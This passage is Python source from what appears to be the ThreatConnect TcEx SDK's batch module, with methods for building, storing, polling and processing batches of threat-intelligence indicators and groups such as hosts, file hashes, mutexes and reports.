"rating": 5.00,
"confidence": 50,
"summary": "53c3609411c83f363e051d455ade78a7
: 57a49b478310e4313c54c0fee46e4d70a73dd580
: db31cb2a748b7e0046d8c97a32a7eb4efde32a0593e5dbd58e07a3b4ae6bf3d7",
"associatedGroups": [
{
"groupXid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904"
}
],
"attribute": [{
"type": "Source",
"displayed": true,
"value": "Malware Analysis provided by external AMA."
}],
"fileOccurrence": [{
"fileName": "drop1.exe",
"date": "2017-03-03T18:00:00-06:00"
}],
"tag": [{
"name": "China"
}],
"xid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904:170139"
}
Args:
indicator_data: The Full Indicator data including attributes, labels, tags,
and associations.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
            Union[dict, object]: The new indicator dict/object or the previously stored dict/object.
"""
if indicator_data.get('type') not in ['Address', 'EmailAddress', 'File', 'Host', 'URL']:
# for custom indicator types the valueX fields are required.
# using the summary we can build the values
index = 1
for value in self._indicator_values(indicator_data.get('summary')):
indicator_data[f'value{index}'] = value
index += 1
if indicator_data.get('type') == 'File':
# convert custom field name to the appropriate value for batch v2
size = indicator_data.pop('size', None)
if size is not None:
indicator_data['intValue1'] = size
if indicator_data.get('type') == 'Host':
# convert custom field name to the appropriate value for batch v2
dns_active = indicator_data.pop('dnsActive', None)
if dns_active is not None:
indicator_data['flag1'] = dns_active
whois_active = indicator_data.pop('whoisActive', None)
if whois_active is not None:
indicator_data['flag2'] = whois_active
return self._indicator(indicator_data, kwargs.get('store', True))
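    # Usage sketch (hypothetical data): for a dict like
    # {'type': 'File', 'summary': '<md5> : <sha1> : <sha256>', 'size': 1024, 'xid': '...'},
    # add_indicator() converts the custom 'size' field to the batch v2 'intValue1'
    # field; the value1/value2/value3 fields are only generated (from the summary)
    # for custom indicator types outside the five standard ones listed above.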
def address(self, ip: str, **kwargs) -> Address:
"""Add Address data to Batch object.
Args:
ip: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Address: An instance of the Address class.
"""
indicator_obj = Address(ip, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def adversary(self, name: str, **kwargs) -> Adversary:
"""Add Adversary data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Adversary: An instance of the Adversary class.
"""
group_obj = Adversary(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def asn(self, as_number: str, **kwargs) -> ASN:
"""Add ASN data to Batch object.
Args:
as_number: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
ASN: An instance of the ASN class.
"""
indicator_obj = ASN(as_number, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def attribute_write_type(self):
"""Return batch attribute write type."""
return self._attribute_write_type
@attribute_write_type.setter
def attribute_write_type(self, attribute_write_type: str):
"""Set batch attribute write type."""
self._attribute_write_type = attribute_write_type
def campaign(self, name: str, **kwargs) -> Campaign:
"""Add Campaign data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
first_seen (str, kwargs): The first seen datetime expression for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Campaign: An instance of the Campaign class.
"""
group_obj = Campaign(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def cidr(self, block: str, **kwargs) -> CIDR:
"""Add CIDR data to Batch object.
Args:
block: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
CIDR: An instance of the CIDR class.
"""
indicator_obj = CIDR(block, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def close(self) -> None:
"""Cleanup batch job."""
        # allow the submit thread to complete before wrapping up
if hasattr(self._submit_thread, 'is_alive'):
self._submit_thread.join()
# allow file threads to complete before wrapping up job
for t in self._file_threads:
t.join()
self.groups_shelf.close()
self.indicators_shelf.close()
if not self.debug and not self.enable_saved_file:
# delete saved files
if os.path.isfile(self.group_shelf_fqfn):
os.remove(self.group_shelf_fqfn)
            if os.path.isfile(self.indicator_shelf_fqfn):
os.remove(self.indicator_shelf_fqfn)
@property
def data(self):
"""Return the batch indicator/group and file data to be sent to the ThreatConnect API.
**Processing Order:**
* Process groups in memory up to max batch size.
* Process groups in shelf to max batch size.
* Process indicators in memory up to max batch size.
* Process indicators in shelf up to max batch size.
This method will remove the group/indicator from memory and/or shelf.
Returns:
dict: A dictionary of group, indicators, and/or file data.
"""
data = {'file': {}, 'group': [], 'indicator': []}
tracker = {'count': 0, 'bytes': 0}
# process group from memory, returning if max values have been reached
if self.data_groups(data, self.groups, tracker) is True:
return data
# process group from shelf file, returning if max values have been reached
if self.data_groups(data, self.groups_shelf, tracker) is True:
return data
# process indicator from memory, returning if max values have been reached
if self.data_indicators(data, self.indicators, tracker) is True:
return data
# process indicator from shelf file, returning if max values have been reached
if self.data_indicators(data, self.indicators_shelf, tracker) is True:
return data
return data
def data_group_association(self, data: dict, tracker: dict, xid: str) -> None:
"""Return group dict array following all associations.
The *data* dict is passed by reference to make it easier to update both the group data
and file data inline versus passing the data all the way back up to the calling methods.
Args:
data: The data dict to update with group and file data.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
xid: The xid of the group to retrieve associations.
"""
xids = deque()
xids.append(xid)
while xids:
xid = xids.popleft() # remove current xid
group_data = None
if xid in self.groups:
group_data = self.groups.get(xid)
del self.groups[xid]
elif xid in self.groups_shelf:
group_data = self.groups_shelf.get(xid)
del self.groups_shelf[xid]
if group_data:
file_data, group_data = self.data_group_type(group_data)
data['group'].append(group_data)
if file_data:
data['file'][xid] = file_data
# update entity trackers
tracker['count'] += 1
tracker['bytes'] += sys.getsizeof(json.dumps(group_data))
# extend xids with any groups associated with the same object
xids.extend(group_data.get('associatedGroupXid', []))
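    # Walkthrough sketch (hypothetical xids): if group "a" lists
    # associatedGroupXid ["b", "c"] and "b" lists ["d"], then
    # data_group_association(data, tracker, "a") pops "a", queues "b" and "c",
    # then "d", so all four groups (plus any attached file content) land in the
    # same batch payload and are removed from memory/shelf as they are collected.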
@staticmethod
def data_group_type(group_data: Union[dict, object]) -> Tuple[dict, dict]:
"""Return dict representation of group data and file data.
Args:
group_data: The group data dict or object.
Returns:
Tuple[dict, dict]: A tuple containing file_data and group_data.
"""
file_data = {}
if isinstance(group_data, dict):
# process file content
file_content = group_data.pop('fileContent', None)
if file_content is not None:
file_data = {
'fileContent': file_content,
'fileName': group_data.get('fileName'),
'type': group_data.get('type'),
}
else:
# get the file data from the object and return dict format of object
if group_data.data.get('type') in ['Document', 'Report']:
file_data = group_data.file_data
group_data = group_data.data
return file_data, group_data
def data_groups(self, data: dict, groups: list, tracker: dict) -> bool:
"""Process Group data.
Args:
data: The data dict to update with group and file data.
groups: The list of groups to process.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
Returns:
bool: True if max values have been hit, else False.
"""
# convert groups.keys() to a list to prevent dictionary change error caused by
# the data_group_association function deleting items from the object.
# process group objects
for xid in list(groups.keys()):
# get association from group data
self.data_group_association(data, tracker, xid)
if tracker.get('count') % 2_500 == 0:
# log count/size at a sane level
self.tcex.log.info(
'''feature=batch, action=data-groups, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
if (
tracker.get('count') >= self._batch_max_chunk
or tracker.get('bytes') >= self._batch_max_size
):
                # stop processing xids once the max limits are reached
self.tcex.log.info(
'''feature=batch, event=max-value-reached, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
return True
return False
def data_indicators(self, data: dict, indicators: list, tracker: dict) -> bool:
"""Process Indicator data.
Args:
data: The data dict to update with group and file data.
indicators: The list of indicators to process.
tracker: A dict containing total count of all entities collected and
the total size in bytes of all entities collected.
Returns:
bool: True if max values have been hit, else False.
"""
# process indicator objects
for xid, indicator_data in list(indicators.items()):
if not isinstance(indicator_data, dict):
indicator_data = indicator_data.data
data['indicator'].append(indicator_data)
del indicators[xid]
# update entity trackers
tracker['count'] += 1
tracker['bytes'] += sys.getsizeof(json.dumps(indicator_data))
if tracker.get('count') % 2_500 == 0:
# log count/size at a sane level
self.tcex.log.info(
'''feature=batch, action=data-indicators, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
if (
tracker.get('count') >= self._batch_max_chunk
or tracker.get('bytes') >= self._batch_max_size
):
                # stop processing xids once the max limits are reached
self.tcex.log.info(
'''feature=batch, event=max-value-reached, '''
f'''count={tracker.get('count'):,}, bytes={tracker.get('bytes'):,}'''
)
return True
return False
@property
def debug(self):
"""Return debug setting"""
if self._debug is None:
self._debug = False
# switching DEBUG file to a directory
if os.path.isfile(self.debug_path):
os.remove(self.debug_path)
os.makedirs(self.debug_path, exist_ok=True)
if os.path.isdir(self.debug_path) and os.access(self.debug_path, os.R_OK):
# create directories only required when debug is enabled
# batch_json - store the batch*.json files
# documents - store the file downloads (e.g., *.pdf)
# reports - store the file downloads (e.g., *.pdf)
os.makedirs(self.debug_path, exist_ok=True)
os.makedirs(self.debug_path_batch, exist_ok=True)
os.makedirs(self.debug_path_files, exist_ok=True)
self._debug = True
return self._debug
def document(self, name: str, file_name: str, **kwargs) -> Document:
"""Add Document data to Batch object.
Args:
name: The name for this Group.
file_name: The name for the attached file for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
file_content (str;method, kwargs): The file contents or
callback method to retrieve file content.
malware (bool, kwargs): If true the file is considered malware.
            password (bool, kwargs): If malware is true a password for the zip archive is required.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Document: An instance of the Document class.
"""
group_obj = Document(name, file_name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def email(self, name: str, subject: str, header: str, body: str, **kwargs) -> Email:
"""Add Email data to Batch object.
Args:
name: The name for this Group.
subject: The subject for this Email.
header: The header for this Email.
body: The body for this Email.
date_added (str, kwargs): The date timestamp the Indicator was created.
from_addr (str, kwargs): The **from** address for this Email.
to_addr (str, kwargs): The **to** address for this Email.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Email: An instance of the Email class.
"""
group_obj = Email(name, subject, header, body, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def email_address(self, address: str, **kwargs) -> EmailAddress:
"""Add Email Address data to Batch object.
Args:
address: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
EmailAddress: An instance of the EmailAddress class.
"""
indicator_obj = EmailAddress(address, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def error_codes(self):
"""Return static list of Batch error codes and short description"""
return {
'0x1001': 'General Error',
'0x1002': 'Permission Error',
'0x1003': 'JsonSyntax Error',
'0x1004': 'Internal Error',
'0x1005': 'Invalid Indicator Error',
'0x1006': 'Invalid Group Error',
'0x1007': 'Item Not Found Error',
'0x1008': 'Indicator Limit Error',
'0x1009': 'Association Error',
'0x100A': 'Duplicate Item Error',
'0x100B': 'File IO Error',
'0x2001': 'Indicator Partial Loss Error',
'0x2002': 'Group Partial Loss Error',
'0x2003': 'File Hash Merge Error',
}
def errors(self, batch_id: int, halt_on_error: Optional[bool] = True) -> list:
"""Retrieve Batch errors to ThreatConnect API.
.. code-block:: javascript
[{
"errorReason": "Incident incident-001 has an invalid status.",
"errorSource": "incident-001 is not valid."
}, {
"errorReason": "Incident incident-002 has an invalid status.",
"errorSource":"incident-002 is not valid."
}]
Args:
batch_id: The ID returned from the ThreatConnect API for the current batch job.
halt_on_error: If True any exception will raise an error.
Returns:
list: A list of batch errors.
"""
errors = []
try:
self.tcex.log.debug(f'feature=batch, event=retrieve-errors, batch-id={batch_id}')
r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')
# API does not return correct content type
if r.ok:
errors = json.loads(r.text)
# temporarily process errors to find "critical" errors.
# FR in core to return error codes.
for error in errors:
error_reason = error.get('errorReason')
for error_msg in self._critical_failures:
if re.findall(error_msg, error_reason):
self.tcex.handle_error(10500, [error_reason], halt_on_error)
return errors
except Exception as e:
self.tcex.handle_error(560, [e], halt_on_error)
def event(self, name: str, **kwargs) -> Event:
"""Add Event data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
event_date (str, kwargs): The event datetime expression for this Group.
status (str, kwargs): The status for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Event: An instance of the Event class.
"""
group_obj = Event(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def file(
self,
md5: Optional[str] = None,
sha1: Optional[str] = None,
sha256: Optional[str] = None,
**kwargs,
) -> File:
"""Add File data to Batch object.
        .. note:: At least one file hash value must be specified.
Args:
md5: The md5 value for this Indicator.
sha1: The sha1 value for this Indicator.
sha256: The sha256 value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
size (str, kwargs): The file size for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
File: An instance of the File class.
"""
indicator_obj = File(md5, sha1, sha256, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def file_merge_mode(self, value: str) -> None:
"""Set the file merge mode for the entire batch job.
Args:
value: A value of Distribute or Merge.
"""
self._file_merge_mode = value
@staticmethod
def generate_xid(identifier: Optional[Union[list, str]] = None):
"""Generate xid from provided identifiers.
.. Important:: If no identifier is provided a unique xid will be returned, but it will
                        not be reproducible. If a list of identifiers is provided, they must be
in the same order to generate a reproducible xid.
Args:
identifier: Optional *string* value(s) to be
used to make a unique and reproducible xid.
"""
if identifier is None:
identifier = str(uuid.uuid4())
elif isinstance(identifier, list):
identifier = '-'.join([str(i) for i in identifier])
identifier = hashlib.sha256(identifier.encode('utf-8')).hexdigest()
return hashlib.sha256(identifier.encode('utf-8')).hexdigest()
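    # Usage sketch (hypothetical identifiers): generate_xid(['my-source', 'incident', '1234'])
    # joins the parts with '-' and hashes the result twice with SHA-256, so the same
    # ordered list always produces the same xid; generate_xid() with no argument hashes
    # a random UUID instead and is therefore not reproducible.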
def group(self, group_type: str, name: str, **kwargs) -> object:
"""Add Group data to Batch object.
Args:
group_type: The ThreatConnect define Group type.
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
object: An instance of one of the Group classes.
"""
group_obj = Group(group_type, name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
@property
def group_shelf_fqfn(self):
"""Return groups shelf fully qualified filename.
For testing/debugging a previous shelf file can be copied into the tc_temp_path directory
instead of creating a new shelf file.
"""
if self._group_shelf_fqfn is None:
# new shelf file
self._group_shelf_fqfn = os.path.join(
self.tcex.args.tc_temp_path, f'groups-{str(uuid.uuid4())}'
)
# saved shelf file
if self.saved_groups:
self._group_shelf_fqfn = self.debug_path_group_shelf
return self._group_shelf_fqfn
@property
def groups(self) -> dict:
"""Return dictionary of all Groups data."""
if self._groups is None:
# plain dict, but could be something else in future
self._groups = {}
return self._groups
@property
def groups_shelf(self) -> object:
"""Return dictionary of all Groups data."""
if self._groups_shelf is None:
self._groups_shelf = shelve.open(self.group_shelf_fqfn, writeback=False)
return self._groups_shelf
@property
def halt_on_error(self) -> bool:
"""Return batch halt on error setting."""
return self._halt_on_error
@halt_on_error.setter
def halt_on_error(self, halt_on_error: bool):
"""Set batch halt on error setting."""
self._halt_on_error = halt_on_error
@property
def halt_on_batch_error(self) -> bool:
"""Return halt on batch error value."""
return self._halt_on_batch_error
@halt_on_batch_error.setter
def halt_on_batch_error(self, value: bool):
"""Set batch halt on batch error value."""
if isinstance(value, bool):
self._halt_on_batch_error = value
@property
def halt_on_file_error(self) -> bool:
"""Return halt on file post error value."""
return self._halt_on_file_error
@halt_on_file_error.setter
def halt_on_file_error(self, value: bool):
"""Set halt on file post error value."""
if isinstance(value, bool):
self._halt_on_file_error = value
@property
def halt_on_poll_error(self) -> bool:
"""Return halt on poll error value."""
return self._halt_on_poll_error
@halt_on_poll_error.setter
def halt_on_poll_error(self, value: bool):
"""Set batch halt on poll error value."""
if isinstance(value, bool):
self._halt_on_poll_error = value
def hash_collision_mode(self, value: str):
"""Set the file hash collision mode for the entire batch job.
Args:
value: A value of Split, IgnoreIncoming, IgnoreExisting, FavorIncoming,
and FavorExisting.
"""
self._hash_collision_mode = value
def host(self, hostname: str, **kwargs) -> Host:
"""Add Host data to Batch object.
Args:
hostname: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
dns_active (bool, kwargs): If True DNS active is enabled for this indicator.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
whois_active (bool, kwargs): If True WhoIs active is enabled for this indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Host: An instance of the Host class.
"""
indicator_obj = Host(hostname, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def incident(self, name: str, **kwargs) -> Incident:
"""Add Incident data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
event_date (str, kwargs): The event datetime expression for this Group.
status (str, kwargs): The status for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Incident: An instance of the Incident class.
"""
group_obj = Incident(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def indicator(self, indicator_type: str, summary: str, **kwargs) -> object:
"""Add Indicator data to Batch object.
Args:
indicator_type: The ThreatConnect define Indicator type.
summary: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
object: An instance of one of the Indicator classes.
"""
indicator_obj = Indicator(indicator_type, summary, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
@property
def indicator_shelf_fqfn(self) -> str:
"""Return indicator shelf fully qualified filename.
For testing/debugging a previous shelf file can be copied into the tc_temp_path directory
instead of creating a new shelf file.
"""
if self._indicator_shelf_fqfn is None:
# new shelf file
self._indicator_shelf_fqfn = os.path.join(
self.tcex.args.tc_temp_path, f'indicators-{str(uuid.uuid4())}'
)
# saved shelf file
if self.saved_indicators:
self._indicator_shelf_fqfn = self.debug_path_indicator_shelf
return self._indicator_shelf_fqfn
@property
def indicators(self) -> dict:
"""Return dictionary of all Indicator data."""
if self._indicators is None:
# plain dict, but could be something else in future
self._indicators = {}
return self._indicators
@property
def indicators_shelf(self) -> object:
"""Return dictionary of all Indicator data."""
if self._indicators_shelf is None:
self._indicators_shelf = shelve.open(self.indicator_shelf_fqfn, writeback=False)
return self._indicators_shelf
def intrusion_set(self, name: str, **kwargs) -> IntrusionSet:
"""Add Intrusion Set data to Batch object.
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
IntrusionSet: An instance of the IntrusionSet class.
"""
group_obj = IntrusionSet(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def mutex(self, mutex: str, **kwargs) -> Mutex:
"""Add Mutex data to Batch object.
Args:
mutex: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Mutex: An instance of the Mutex class.
"""
indicator_obj = Mutex(mutex, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def poll(
self,
batch_id: int,
retry_seconds: Optional[int] = None,
back_off: Optional[float] = None,
timeout: Optional[int] = None,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Poll Batch status to ThreatConnect API.
.. code-block:: javascript
{
"status": "Success",
"data": {
"batchStatus": {
"id":3505,
"status":"Completed",
"errorCount":0,
"successCount":0,
"unprocessCount":0
}
}
}
Args:
batch_id: The ID returned from the ThreatConnect API for the current batch job.
retry_seconds: The base number of seconds used for retries when job is not completed.
back_off: A multiplier to use for backing off on
each poll attempt when job has not completed.
timeout: The number of seconds before the poll should timeout.
halt_on_error: If True any exception will raise an error.
Returns:
dict: The batch status returned from the ThreatConnect API.
"""
# check global setting for override
if self.halt_on_poll_error is not None:
halt_on_error = self.halt_on_poll_error
# initial poll interval
if self._poll_interval is None and self._batch_data_count is not None:
# calculate poll_interval base off the number of entries in the batch data
# with a minimum value of 5 seconds.
self._poll_interval = max(math.ceil(self._batch_data_count / 300), 5)
elif self._poll_interval is None:
# if not able to calculate poll_interval default to 15 seconds
self._poll_interval = 15
# poll retry back_off factor
poll_interval_back_off = float(2.5 if back_off is None else back_off)
# poll retry seconds
poll_retry_seconds = int(5 if retry_seconds is None else retry_seconds)
# poll timeout
if timeout is None:
timeout = self.poll_timeout
else:
timeout = int(timeout)
params = {'includeAdditional': 'true'}
poll_count = 0
poll_time_total = 0
data = {}
while True:
poll_count += 1
poll_time_total += self._poll_interval
time.sleep(self._poll_interval)
self.tcex.log.info(f'feature=batch, event=progress, poll-time={poll_time_total}')
try:
# retrieve job status
r = self.tcex.session.get(f'/v2/batch/{batch_id}', params=params)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)
return data
data = r.json()
if data.get('status') != 'Success':
self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)
except Exception as e:
self.tcex.handle_error(540, [e], halt_on_error)
if data.get('data', {}).get('batchStatus', {}).get('status') == 'Completed':
# store last 5 poll times to use in calculating average poll time
modifier = poll_time_total * 0.7
self._poll_interval_times = self._poll_interval_times[-4:] + [modifier]
weights = [1]
poll_interval_time_weighted_sum = 0
for poll_interval_time in self._poll_interval_times:
poll_interval_time_weighted_sum += poll_interval_time * weights[-1]
# weights will be [1, 1.5, 2.25, 3.375, 5.0625] for all 5 poll times depending
# on how many poll times are available.
weights.append(weights[-1] * 1.5)
# pop off the last weight so its not added in to the sum
weights.pop()
# calculate the weighted average of the last 5 poll times
self._poll_interval = math.floor(poll_interval_time_weighted_sum / sum(weights))
if poll_count == 1:
# if completed on first poll, reduce poll interval.
self._poll_interval = self._poll_interval * 0.85
self.tcex.log.debug(f'feature=batch, poll-time={poll_time_total}, status={data}')
return data
# update poll_interval for retry with max poll time of 20 seconds
self._poll_interval = min(
poll_retry_seconds + int(poll_count * poll_interval_back_off), 20
)
# time out poll to prevent App running indefinitely
if poll_time_total >= timeout:
self.tcex.handle_error(550, [timeout], True)
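    # Usage sketch (hypothetical `batch` instance and batch id):
    #   status = batch.poll(batch_id=3505, timeout=1800)
    # sleeps between requests, widening the interval on each retry (capped at 20
    # seconds), and returns the full API response once
    # response['data']['batchStatus']['status'] == 'Completed', or halts on timeout.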
@property
def poll_timeout(self) -> int:
"""Return current poll timeout value."""
return self._poll_timeout
@poll_timeout.setter
def poll_timeout(self, seconds: int):
"""Set the poll timeout value."""
self._poll_timeout = int(seconds)
def process_all(self, process_files: Optional[bool] = True) -> None:
"""Process Batch request to ThreatConnect API.
Args:
process_files: Send any document or report attachments to the API.
"""
while True:
content = self.data
file_data = content.pop('file', {})
if not content.get('group') and not content.get('indicator'):
break
# special code for debugging App using batchV2.
self.write_batch_json(content)
# store the length of the batch data to use for poll interval calculations
self.tcex.log.info(
'''feature=batch, event=process-all, type=group, '''
f'''count={len(content.get('group')):,}'''
)
self.tcex.log.info(
'''feature=batch, event=process-all, type=indicator, '''
f'''count={len(content.get('indicator')):,}'''
)
if process_files:
self.process_files(file_data)
def process_files(self, file_data: dict) -> None:
"""Process Files for Documents and Reports to ThreatConnect API.
Args:
file_data: The file data to be processed.
"""
for xid, content_data in list(file_data.items()):
del file_data[xid]  # win or lose, remove the entry
# define the saved filename
api_branch = 'reports' if content_data.get('type') == 'Report' else 'documents'
fqfn = os.path.join(
self.debug_path_files,
f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',
)
# used for debug/testing to prevent upload of previously uploaded file
if self.debug and xid in self.saved_xids:
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
if os.path.isfile(fqfn):
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
# process the file content
content = content_data.get('fileContent')
if callable(content):
content_callable_name = getattr(content, '__name__', repr(content))
self.tcex.log.trace(
f'feature=batch-submit-files, method={content_callable_name}, xid={xid}'
)
content = content_data.get('fileContent')(xid)
if content is None:
self.tcex.log.warning(f'feature=batch-submit-files, xid={xid}, event=content-null')
continue
# write the file to disk
with open(fqfn, 'wb') as fh:
fh.write(content)
def registry_key(
self, key_name: str, value_name: str, value_type: str, **kwargs
) -> RegistryKey:
"""Add Registry Key data to Batch object.
Args:
key_name: The key_name value for this Indicator.
value_name: The value_name value for this Indicator.
value_type: The value_type value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
RegistryKey: An instance of the Registry Key class.
"""
indicator_obj = RegistryKey(key_name, value_name, value_type, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def report(self, name: str, **kwargs) -> Report:
"""Add Report data to Batch object.
Args:
name: The name for this Group.
file_name (str): The name for the attached file for this Group.
date_added (str, kwargs): The date timestamp the Group was created.
file_content (str;method, kwargs): The file contents or callback method to retrieve
file content.
publish_date (str, kwargs): The publish datetime expression for this Group.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Report: An instance of the Report class.
"""
group_obj = Report(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def save(self, resource: Union[dict, object]) -> None:
"""Save group|indicator dict or object to shelve.
Best effort to save group/indicator data to disk. If for any reason the save fails,
the data will still be accessible from the list in memory.
Args:
resource: The Group or Indicator dict or object.
"""
resource_type = None
xid = None
if isinstance(resource, dict):
resource_type = resource.get('type')
xid = resource.get('xid')
else:
resource_type = resource.type
xid = resource.xid
if resource_type is not None and xid is not None:
saved = True
if resource_type in self.tcex.group_types:
try:
# groups
self.groups_shelf[xid] = resource
except Exception:
saved = False
if saved:
try:
del self._groups[xid]
except KeyError:
# if the group was saved twice it would already be deleted
pass
elif resource_type in self.tcex.indicator_types_data.keys():
try:
# indicators
self.indicators_shelf[xid] = resource
except Exception:
saved = False
if saved:
try:
del self._indicators[xid]
except KeyError:
# if the indicator was saved twice it would already be deleted
pass
@property
def saved_groups(self) -> bool:
"""Return True if saved group files exits, else False."""
if self._saved_groups is None:
self._saved_groups = False
if (
self.enable_saved_file
and os.path.isfile(self.debug_path_group_shelf)
and os.access(self.debug_path_group_shelf, os.R_OK)
):
self._saved_groups = True
self.tcex.log.debug('feature=batch, event=saved-groups-file-found')
return self._saved_groups
@property
def saved_indicators(self) -> bool:
"""Return True if saved indicators files exits, else False."""
if self._saved_indicators is None:
self._saved_indicators = False
if (
self.enable_saved_file
and os.path.isfile(self.debug_path_indicator_shelf)
and os.access(self.debug_path_indicator_shelf, os.R_OK)
):
self._saved_indicators = True
self.tcex.log.debug('feature=batch, event=saved-indicator-file-found')
return self._saved_indicators
@property
def saved_xids(self) -> list:
